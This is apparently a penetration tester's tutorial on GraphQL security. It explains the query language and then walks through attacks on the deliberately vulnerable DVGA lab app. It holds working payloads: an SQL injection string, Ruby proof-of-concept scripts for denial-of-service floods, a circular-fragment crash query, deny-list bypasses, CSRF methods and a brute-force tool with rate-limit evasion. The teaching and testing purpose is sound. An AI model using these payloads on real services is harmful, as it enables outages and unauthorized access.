Before attacking GraphQL hands on, we need to understand what it is and how it works. That’s what we’ll see in What is GraphQL? section.

Then, I’ll introduce Security considerations and a glance of how we could abuse some features.

Next, I’ll showcase several GraphQL vulnerabilities and attacks, how they work and how to exploit them as well as illustrations with POCs.

Finally, I’ll present a few offensive tools.

What is GraphQL?

GraphQL logo

Quick history

Goals

GraphQL is a query language for APIs and query runtime engine.

It’s an alternative to API schemas like REST, SOAP, gRPC. It’s not an absolute replacement, in some cases GraphQL is better suited, in some cases REST or gRPC are. Sometimes they can coexist or GraphQl can even be used on top of another API as an abstraction layer.

GraphQL doesn’t replace:

  • graph databases (Neo4j, ArangoDB, OrientDB)
  • query languages (SQL, NoSQL)
  • object-relational mapping (ORM) (Hibernate, CodeIgniter, SQLAlchemy, ActiveRecord)
  • state management libraries (Redux, Recoil, BLoC, Riverpod)

Key information

GraphQL is available for all major languages, it officially supports JavaScript, Go, PHP, Java / Kotlin, C# / .NET, Python, Swift / Objective-C, Rust, Ruby, Elixir, Scala, Flutter, Clojure, Haskell, C / C++, Elm, OCaml / Reason, Erlang, Julia, R, Groovy, Perl, D, Ballerina.

Query result is returned in JSON.

It is both a query language and server-side API runtime.

Core concepts

  • Only ask for what you need
  • Get predictable results
  • get many resources in a single request
  • Organized in terms of types and fields, not endpoints
  • Add new fields and types to a GraphQL API without impacting existing queries
  • Not limited by a specific storage engine
  • Real-time ready

Examples

Data description

type Project {
  name: String
  tagline: String
  contributors: [User]
}

Query

{
  project(name: "GraphQL") {
    tagline
  }
}

One can think of it as:

SELECT tagline FROM project where name = "GraphQL"

Answer

{
  "project": {
    "tagline": "A query language for APIs"
  }
}

Only what you need

One only needs the hero’s name?

{
  hero {
    name
  }
}

Just get the hero’s name.

{
  "hero": {
      "name": "Luke Skywalker"
  }
}

One needs the hero’s name and height?

{
  hero {
    name
    height
  }
}

Get exactly that.

{
  "hero": {
      "name": "Luke Skywalker",
      "height": 1.72
  }
}

With a REST API one would probably has queried an endpoint that always returns the same field where one either has too much data or not enough.

GET /hero/0

{
  "name": "Luke Skywalker",
  "height": 1.72,
  "mass": 77,
  "address": "Galaxy du Centaure"
}

Many resources in a single request

It’s possible to query the data belonging to the user, the associated posts, and its followers in the same request.

query {
  User(id: 1337) {
    name
    posts {
      title
    }
    followers(last: 3) {
      name
    }
  }
}
{
  "data": {
    "User": {
      "name": "noraj",
      "posts": [
        { "title": "From cookie flag to DA" },
        { "title": "Why you shouldn't disable IPv6" }
      ],
      "followers": [
        { "name": "Alice" },
        { "name": "Bob" }
        { "name": "Carole" }
      ]
    }
}

While with REST we would probably have to make three queries.

REST query n°1 to get user information.

GET /users/1337

{
  "user": {
    "id": 1337,
    "name": "noraj",
    "address": {...},
    "birthday": "30/02/1979"
  }
}

REST query n°2 to get user’s posts.

GET /users/1337/posts

{
  "posts": [{
    "id": 5542,
    "title": "From cookie flag to DA",
    "content": "...",
    "comments": [...]
  }, {
    "id": 5543,
    "title": "Why you shouldn't disable IPv6",
    "content": "...",
    "comments": [...]
  }]
}

REST query n°3 to get user’s followers.

GET /users/1337/followers

{
  "followers": [{
    "id": 1338,
    "name": "Alice",
    "address": {...},
    "birthday": "01/05/1979"
    },{
    "id": 1339,
    "name": "Bob",
    "address": {...},
    "birthday": "15/07/1978"
    },{...}]
}

In this case, usage of GraphQL over REST is optimal.

  • With REST:
    • 3 query
    • too much data
  • With GraphQL:
    • 1 query
    • exact data

Security considerations

DVGA

To practice the following examples, deploy DVGADamn Vulnerable GraphQL Application, found on OWASP VWAD, which is an intentionally vulnerable application implementing many GraphQL vulnerabilities.

Installation steps:

$ git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git dvga && cd dvga
$ docker build -t dvga .
$ docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 --name dvga dvga

We can define a custom local domain.

$ cat /etc/hosts | grep .test
127.0.0.2 noraj.test

In order to verify the application is running correctly, let’s make a HTTP request on the GraphQL endpoint: curl http://noraj.test:5013/graphql.

Now let’s put in practice Escape Pentesting GraphQL 101 series.

  1. Part 1 – Discovery
  2. Part 2 – Interaction
  3. Part 3 – Exploitation

Reconnaissance / Discovery

Doing some initial discovery steps allows:

  • Understanding the limits enforced
  • Determining the verbosity
  • Fetching all the information possible about the architecture

Before we start: Resources

It’s advised to install a GraphQL client to ease the interaction with the endpoint. Curious people or later use can consult or bookmark the following websites to search for tools and resources related to GraphQL security.

1st query / most basic operation

A very simple query is to ask for __typename, the answer will reflect the type of query we are doing.

For example for a Query:

query {
  __typename
}
{
  "data": {
    "__typename": "Query"
  }
}

For a Mutation:

mutation {
  __typename
}
{
  "data": {
    "__typename": "Mutations"
  }
}

Note: GraphQL mutation is the equivalent of PUT method for REST, it is used to write or update content.

Aliases

It’s possible to use aliases either to get custom key name on the answer or to get several times the same field.

query {
  title1: __typename
  title2: __typename
  title3: __typename
  title4: __typename
  title5: __typename
}
{
  "data": {
    "title1": "Query",
    "title2": "Query",
    "title3": "Query",
    "title4": "Query",
    "title5": "Query"
  }
}

But for discovery it has other usages:

  • Many alias to detect alias limit
  • Very long alias name to detect character limit

Detect verbosity

We can trigger an error on purpose to detect the error verbosity of the engine.

query {
  noraj
}
{
  "errors": [
    {
      "message": "Cannot query field \"noraj\" on type \"Query\".",
      "locations": [
        {
          "line": 2,
          "column": 3
        }
      ]
    }
  ]
}

Introspection

With gRPC there can be Reflection enabled that allows to retrieve the prototype and list services.

Eg. with grpcurl:

# Server supports reflection
grpcurl localhost:8787 list

With GraphQL there is not such an easy thing like a magic endpoint or query to get the whole schema in one shot, but there is something similar called introspection that allows to get part of the schema depending on the complexity of the request.

Note: introspection may be enabled or disabled by default depending on the engine.

Here is a minimal example:

{
  __schema {
    queryType {
      fields {
        name
      }
    }
  }
}

introspection query answer

It’s possible to craft a more complex query to dump the near complete schema.

There are some "Full" introspection query to get all queries, mutations, fields, etc. This one is compatible with GraphQL Voyager.

full introspection query answer

It’s possible to judge the size of the answer by the size of the scrollbar. It’s nice to have such a complete answer, but it became too long to be read manually.

Hopefully some tools allow visualizing the schema as a graph GraphQL Voyager or GraphQL Visualizer which is more friendly for the human brain.

Field suggestion

But a basic security measure is to disable introspection, so how to get schema when it is disabled?

Then, it’s possible to abuse of error suggestions: did you mean.

In case of error, most engine will try to suggest the correct field based on the user entry.

query {
  past
}
{
  "errors": [
    {
      "message": "Cannot query field \"past\" on type \"Query\". Did 
        you mean \"paste\" or \"pastes\"?",
      "locations": [
        {
          "line": 3,
          "column": 2
        }
      ]
    }
  ]
}

Clairvoyance allows automating the extraction of a partial schema from brute-force and abusing of field suggesting.

clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql \
# -w /usr/lib/python3.10/site-packages/clairvoyance/wordlist.txt

# /usr/share/seclists/Miscellaneous/lang-english.txt is too heavy,
# ~350k entries while default clairvoyance WL is ~10k

# english-words is ~5k entries
sudo -E wordlistctl fetch -d english-words
clairvoyance -o /tmp/dvga-schema.json http://noraj.test:5013/graphql \
 -w /usr/share/wordlists/misc/english-words.10.txt

# /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
# is ~38k and full of garbage

# else build a custom wordlist

Finding paths

graphql-path-enum lists the different ways of reaching a given type in a GraphQL schema. It can allow finding an indirect path to an object to bypass restrictions.

$ graphql-path-enum -i /tmp/introspection-response.json -t OwnerObject
Found 3 ways to reach the "OwnerObject" node:
- Query (pastes) -> PasteObject (owner) -> OwnerObject
- Query (paste) -> PasteObject (owner) -> OwnerObject
- Query (readAndBurn) -> PasteObject (owner) -> OwnerObject

Fingerprinting

Often the GraphQL endpoint will be /graphql or /v1/graphql. It’s generally not hard to find but else it’s possible to try detecting the endpoint with graphw00f.

$ graphw00f -d -t http://noraj.test:5013
[*] Checking http://noraj.test:5013/
[*] Checking http://noraj.test:5013/graphql
[!] Found GraphQL at http://noraj.test:5013/graphql

Identifying GraphQL engine.

$ graphw00f -f -t http://noraj.test:5013/graphql
[*] Checking if GraphQL is available at http://noraj.test:5013/graphql...
[!] Found GraphQL.
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (Graphene)
[!] Attack Surface Matrix: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/graphene.md
[!] Technologies: Python
[!] Homepage: https://graphene-python.org
[*] Completed.

Here graphw00f identified grapheme engine:

graphene engine

Vulnerabilities

Multipath Evaluation

As an example, take the schema of DVGA, imagine the access to character object is blocked.

DVGA schema

Five locations have to be blocked as well:

  • character query
  • characters query
  • results field of the characters object
  • resident field of the Location object
  • characters field of the Episode object

DVGA schema - character path

It’s prone to error, if one place is forgotten…

For example, for a website, one is not authorized to view other users’ info (client object) but can access the client field of the comments object. It allows an authorization bypass.

SQL injection

GraphQL API often fetch data from a DB.

Where to inject in order to detect a SQLi?

The only injectable inputs are Arguments. One can think of it as a SQL WHERE statement.

query {
  user(name: "' or 1=1 --") {
    id
      email
  }
}

Denial of Service – Batch Query Attack (JSON array)

  1. Find a query that take a long time to execute
  2. Batch it!

GraphQL query:

{
  systemUpdate
}

For example in DVGA, systemUpdate takes about 30 seconds to execute.

HTTP request:

POST /graphql HTTP/1.1
...
Content-Type: application/json

{"query":"{\n\tsystemUpdate\n}"}

The concept is to send several queries in the same request.

Most GraphQL client don’t support batch query, they often have a mode to select one or another but won’t send both on the HTTP JSON. So one has to craft the HTTP request themself.

Ruby PoC for batch querying:

require 'httpx'

data = Array.new(3) {
  { 'query' => 'query { systemUpdate }'}
}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

The PoC does:

  • query 3 times systemUpdate
  • send over the proxy for Burp logging
  • extend timeout (default 60sec) because systemUpdate takes ~32 sec and the PoC is querying it 3 times, so it will take ~ 90 sec

The HTTP request body will look like:

[
  {
    "query": "query { systemUpdate }"
  },
  {
    "query": "query { systemUpdate }"
  },
  {
    "query": "query { systemUpdate }"
  }
]

Denial of Service – Deep recursion query attack

This attack is possible when there is a circular reference.

DVGA schema

The paste object can have an owner field and the owner object can have a paste field. The idea is just to nest them deeply.

DoS result

Writing the query by hand becomes quickly laborious, so scripting it is highly valuable.

Ruby PoC for deep recursion:

require 'httpx'

nesting_level = 10
recursion_pattern = 'pastes{owner{'
fields = 'name'
payload = recursion_pattern * nesting_level + fields + '}}' * nesting_level

data = { 'query' => "query{#{payload}}"}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

DoS result

Denial of Service – Field duplication attack

As the title suggests, the attack concept is to duplicate many times the same field.

query {
  pastes {
    ipAddr # 1
    ipAddr # 2
    # ...
    ipAddr # 1000
  }
}

Unlike the two previous attacks, it’s not consuming time exponentially so several thousands fields are required to make the server hang significantly.

Ruby PoC for field duplication:

require 'httpx'

copy_level = 6000
copy_pattern = 'ipAddr,'
payload = copy_pattern * copy_level

data = { 'query' => "query{pastes{#{payload}}}"}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

DoS result

Denial of Service – Query aliases duplication attack

It’s an alternative the batch query attack when batching is disabled or not supported by the engine. Instead of creating several queries calling the same method, it uses only one query but use aliases to be able to call several times the same method.

query {
  q1: systemUpdate
  q2: systemUpdate
  q3: systemUpdate
}

Ruby PoC for query aliases duplication:

require 'httpx'

copy_level = 3
query = 'systemUpdate'
payload = (1..copy_level).map { |i| "q#{i}:#{query}" }.join(',')
data = { 'query' => "query{#{payload}}"}

HTTPX
  .plugin(:proxy)
  .with_proxy(uri: 'http://127.0.0.1:8080')
  .with(timeout: { operation_timeout: 120 })
  .post('http://noraj.test:5013/graphql', json: data)

Denial of Service – Circular fragments attack

The Spread operator (...) allows reusing fragments. It’s like a mixin.

Example of legitimate use:

fragment smallPaste on PasteObject {
  id
  title
  content
}
query allPastes {
  pastes {
    ...smallPaste
  }
}
query allPastesWithStatus {
  pastes {
    public
    ...smallPaste
  }
}

It’s easy to create an infinite loop by having two fragments call each other.

fragment noraj on PasteObject {
  title
  content
  ...jaron
}
fragment jaron on PasteObject {
  content
  title
  ...noraj
}
query {
  ...noraj
}

PS: the query may not even be needed.

Warning: use with caution during audits because on some engines it make it crash instantly, it’s the most effective technique.

Query whitelist/blacklist bypass

Take the following direct query to systemHealth:

query {
  systemHealth
}

This query is protected and reserved for privileged users.

{
  "errors": [
    {
      "message": "400 Bad Request: Query is on the Deny List.",
      "locations": [
        {
          "line": 2,
          "column": 2
        }
      ],
      "path": [
        "systemHealth"
      ]
    }
  ],
  "data": {
    "systemHealth": null
  }
}

Sometimes just using a query with a different operation name can work.

query random {
  systemHealth
}

If not a similar error is returned:

{
  "errors": [
    {
      "message": "400 Bad Request: Operation Name \"random\" is not allowed.",
      "locations": [
        {
          "line": 2,
          "column": 2
        }
      ],
      "path": [
        "systemHealth"
      ]
    }
  ],
  "data": {
    "systemHealth": null
  }
}

This technique allows bypassing blacklists but not whitelists.

To bypass a (poorly written) whitelist, use a query with allowed operation name:

query getPastes {
  systemHealth
}
{
  "data": {
    "systemHealth": "System Load: 2.54\n"
  }
}

In some cases, a simple alias too could bypass filters.

query {
  bypass: systemHealth
}

CSRF – POST-based

A common misconception is that JSON based API are not vulnerable to CSRF.

But in fact it works all the same.

Create a classic CSRF form and convert form data to JSON at submit with JavaScript and use application/json as content type as it’s probably the only accepted Content-Type by the GraphQL engine. More occasionally, due to middleware, some endpoint may accept application/x-www-form-urlencoded as well.

Another option is to prepare a full JSON query in JavaScript and auto-submit it with fetch() or XHR.

Note : of course, CSRF are mostly useful for mutations.

CSRF – GET-based

Misconfigured GraphiQL can authorize mutations over GET request so the CSRF is as easy as URL-encoding the while query and putting the URL in an image or an iframe.

As queries are normally non-state changing, they are often authorized over GET, but if a state-changing GraphQL operation is misplaced in a query instead of a mutation, then it could be authorized over GET.

Tools

graphql-cop is a GraphQL vulnerability scanner.

graphql-cop example

CrackQL is a GraphQL password brute-force and fuzzing utility with the following features:

  • Defense evasion: evades traditional API HTTP rate-limit and query cost analysis defenses
  • Generic fuzzing (intruder like but benefits from defense evasion)
mutation {
  login(username: {{username|str}}, password: {{password|str}}) {
    accessToken
  }
}
crackql -t http://noraj.test:5013/graphql -q login.graphql -i usernames_and_passwords.csv

GraphQLmap is a scripting engine to interact with a GraphQL endpoint notably for:

  • field fuzzing
  • NoSQLi / SQLi

GraphQL Threat Matrix is a resource that list the differences in how GraphQL implementations interpret and conform to the GraphQL specification.

graphql threat matrix

InQL is a CLI tool and Burp extension for GraphQL.

InQL example
InQL example
InQL example

About the author

Article written by Alexandre ZANNI aka noraj, Penetration Testing Engineer at ACCEIS.